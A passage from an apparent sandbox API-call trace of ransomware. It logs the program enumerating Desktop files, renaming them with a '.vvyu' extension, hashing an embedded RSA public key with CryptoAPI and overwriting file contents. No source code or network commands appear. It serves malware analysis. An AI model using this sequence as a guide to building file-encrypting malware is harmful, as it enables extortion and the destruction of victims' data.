returned 0x2a40528 [0188.404] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x2aedf88 [0188.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0188.404] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\jkGJiQ3H.wav" (normalized: "c:\\users\\keecfmwgj\\desktop\\jkgjiq3h.wav"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\jkGJiQ3H.wav.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\jkgjiq3h.wav.vvyu")) returned 1 [0188.406] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aedf88 | out: hHeap=0x2c0000) returned 1 [0188.406] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0188.406] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0188.409] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0188.409] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x819a0f70, ftCreationTime.dwHighDateTime=0x1d8a107, ftLastAccessTime.dwLowDateTime=0x5bc04980, ftLastAccessTime.dwHighDateTime=0x1d8a34c, ftLastWriteTime.dwLowDateTime=0x5bc04980, ftLastWriteTime.dwHighDateTime=0x1d8a34c, nFileSizeHigh=0x0, nFileSizeLow=0x1360e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nFEQU_fXuy ewF.mkv", cAlternateFileName="NFEQU_~1.MKV")) returned 1 [0188.409] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2650 [0188.409] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0188.409] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2650 | out: hHeap=0x2c0000) returned 1 [0188.410] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\nFEQU_fXuy ewF.mkv") returned=".mkv" [0188.410] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\nFEQU_fXuy ewF.mkv" (normalized: "c:\\users\\keecfmwgj\\desktop\\nfequ_fxuy ewf.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0188.410] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=79374) returned 1 [0188.410] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0188.415] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x135e8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0188.415] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0188.417] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0188.417] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0188.417] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0188.418] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x1360e, lpOverlapped=0x0) returned 1 [0188.419] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0188.419] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0188.419] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0188.419] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0188.419] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0188.420] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0188.420] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0188.420] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0188.420] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0188.420] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0188.420] GetLastError () returned 0x0 [0188.420] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0188.420] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0188.421] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0188.421] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0188.421] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0188.421] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0188.421] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0188.421] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0188.421] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0188.421] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x13610) returned 0x2af5168 [0188.422] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0188.422] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0188.422] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adfa00 [0188.422] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0188.422] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0188.422] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0188.422] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2650 [0188.422] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d8e0 [0188.422] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2698 [0188.422] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d8f8 [0188.422] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d928 [0188.422] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d988 [0188.423] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d940 [0188.423] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0188.423] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0188.423] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aedfa0 [0188.423] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af1f88 [0188.423] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d928 | out: hHeap=0x2c0000) returned 1 [0188.423] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d940 | out: hHeap=0x2c0000) returned 1 [0188.423] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d988 | out: hHeap=0x2c0000) returned 1 [0188.423] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0188.423] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1f88 | out: hHeap=0x2c0000) returned 1 [0188.423] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d988 [0188.423] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e30 [0188.424] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d940 [0188.424] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0188.424] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2a0d928 [0188.424] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e40 [0188.424] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0188.424] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0188.424] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f90 [0188.424] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0188.424] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0188.424] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ae8 [0188.424] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0188.424] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0188.424] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d940 | out: hHeap=0x2c0000) returned 1 [0188.424] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0188.424] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d928 | out: hHeap=0x2c0000) returned 1 [0188.424] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0188.425] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0188.425] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d988 | out: hHeap=0x2c0000) returned 1 [0188.425] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0188.425] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0188.426] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aedfa0 | out: hHeap=0x2c0000) returned 1 [0188.426] GetCurrentThreadId () returned 0x5d8 [0188.426] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0188.426] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ee4a0 [0188.426] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0188.426] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0188.426] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0188.426] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0188.426] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0188.426] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0188.426] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0188.426] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0188.427] GetCurrentThreadId () returned 0x5d8 [0188.427] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0188.427] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0188.427] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0188.427] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0188.428] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0188.428] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0188.428] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0188.429] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0188.429] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0188.429] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0188.429] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40528 [0188.429] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0188.429] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0188.429] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0188.429] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d988 [0188.429] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0188.429] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0188.429] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0188.429] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0188.429] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0188.429] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0188.429] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0188.429] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0188.429] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d928 [0188.430] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0188.430] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0188.430] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0188.430] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0188.430] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0188.430] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0188.430] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0188.430] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d940 [0188.430] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0188.430] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0188.430] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0188.430] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d910 [0188.430] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0188.430] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d9a0 [0188.430] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0188.430] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e50 [0188.430] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0188.430] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d970 [0188.430] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0188.430] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d958 [0188.430] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0188.430] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d9b8 [0188.430] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d958 | out: hHeap=0x2c0000) returned 1 [0188.431] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d958 [0188.431] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d970 | out: hHeap=0x2c0000) returned 1 [0188.431] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0188.431] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0188.431] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0188.431] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0188.431] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0188.431] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d928 | out: hHeap=0x2c0000) returned 1 [0188.431] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d928 [0188.431] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0188.431] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af1f88 [0188.431] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d988 | out: hHeap=0x2c0000) returned 1 [0188.431] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0188.431] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d9b8 | out: hHeap=0x2c0000) returned 1 [0188.431] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af2198 [0188.431] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0188.431] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0188.431] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0188.431] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0188.431] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d928 | out: hHeap=0x2c0000) returned 1 [0188.431] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af23b0 [0188.432] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0188.432] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0188.432] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0188.433] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0188.433] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0188.434] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0188.434] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0188.434] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0188.434] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af2198 | out: hHeap=0x2c0000) returned 1 [0188.435] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af23b0 | out: hHeap=0x2c0000) returned 1 [0188.435] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0188.435] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0188.435] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d958 | out: hHeap=0x2c0000) returned 1 [0188.435] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0188.435] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d9a0 | out: hHeap=0x2c0000) returned 1 [0188.435] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0188.435] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d940 | out: hHeap=0x2c0000) returned 1 [0188.435] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d910 | out: hHeap=0x2c0000) returned 1 [0188.436] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0188.436] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0188.436] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0188.436] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d8f8 | out: hHeap=0x2c0000) returned 1 [0188.437] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2698 | out: hHeap=0x2c0000) returned 1 [0188.437] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1f88 | out: hHeap=0x2c0000) returned 1 [0188.437] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0188.438] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0188.438] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0188.439] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0188.439] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0188.439] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0188.439] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f90 | out: hHeap=0x2c0000) returned 1 [0188.439] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0188.440] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0188.440] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfa00 | out: hHeap=0x2c0000) returned 1 [0188.440] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0x13609, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0x13609, lpOverlapped=0x0) returned 1 [0188.442] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0188.442] SetFilePointerEx (in: 